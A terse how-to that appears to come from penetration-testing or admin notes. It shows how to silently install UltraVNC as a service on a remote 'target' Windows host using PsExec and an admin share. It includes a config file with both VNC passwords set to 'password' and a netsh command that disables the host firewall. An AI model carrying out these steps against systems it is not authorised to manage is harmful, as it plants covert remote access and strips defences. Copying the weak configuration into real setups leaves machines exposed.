• From a Windows system :
  • Download PSExec : http://technet.microsoft.com/en-us/sysinternals/bb897553
• From a Linux system :
  • Download winexe : http://web.archive.org/web/20090508143644/http://eol.ovh.org/winexe/winexe-static-081123.bz2 : source
• Download UltraVNC :
• Copy the UltraVNC installation binary to the target Windows system using Windows filesharing

  net use \\targethost\c$ /user:jdoe
  copy UltraVNC_1.0.9.6.1_Setup.exe \\targethost\c$\
  

• Install UltraVNC with the “/verysilent” argument

  psexec \\targethost -u jdoe -i C:\UltraVNC_1.0.9.6.p.exe /verysilent
  

  PsExec v1.98 - Execute processes remotely
  Copyright (C) 2001-2010 Mark Russinovich
  Sysinternals - www.sysinternals.com
  
  Password:
  
  C:\UltraVNC_1.0.9.6.1_Setup.exe exited on 192.168.0.10 with error 0.
  

• Create a local configuration file for UltraVNC. This can be done either by installing your own copy and using the config file, or by using this text. The configuarion file is called “ultravnc.ini”

  [Permissions]
  [admin]
  FileTransferEnabled=1
  FTUserImpersonation=1
  BlankMonitorEnabled=1
  BlankInputsOnly=0
  CaptureAlphaBlending=0
  BlackAlphaBlending=0
  DefaultScale=1
  UseDSMPlugin=0
  DSMPlugin=
  DSMPluginConfig=
  primary=1
  secondary=0
  SocketConnect=1
  HTTPConnect=1
  XDMCPConnect=0
  AutoPortSelect=0
  InputsEnabled=1
  LocalInputsDisabled=0
  IdleTimeout=0
  EnableJapInput=0
  QuerySetting=2
  QueryTimeout=10
  QueryAccept=0
  LockSetting=0
  RemoveWallpaper=1
  RemoveEffects=0
  RemoveFontSmoothing=0
  RemoveAero=1
  DebugMode=0
  Avilog=0
  path=C:\Program Files\UltraVNC
  DebugLevel=0
  AllowLoopback=0
  LoopbackOnly=0
  AllowShutdown=1
  AllowProperties=1
  AllowEditClients=1
  FileTransferTimeout=30
  KeepAliveInterval=5
  SocketKeepAliveTimeout=10000
  DisableTrayIcon=0
  MSLogonRequired=0
  NewMSLogon=0
  ConnectPriority=0
  PortNumber=5900
  HTTPPortNumber=5800
  [ultravnc]
  ; both passwords are "password"
  passwd=DBD83CFD727A145800
  passwd2=DBD83CFD727A145800
  

• Copy the new configuration file to the target Windows machine

  copy ultravnc.ini "\\targethost\c$\Program Files\UltraVNC\"
  

• Install UltraVNC as a Windows service on the target Windows machine

  psexec \\targethost -u jdoe -i "C:\Program Files\UltraVNC\winvnc.exe" -install
  

  PsExec v1.98 - Execute processes remotely
  Copyright (C) 2001-2010 Mark Russinovich
  Sysinternals - www.sysinternals.com
  
  Password:
  
  C:\Program Files\UltraVNC\winvnc.exe exited on 192.168.0.10 with error code 0.
  

• If the target Windows machine has it’s Windows firewall enabled and blocking the port, you can disable it

  psexec \\targethost -u jdoe -i netsh firewall set opmode disable
  

• You should now be able to initiate a VNC connection to the target using the password “password”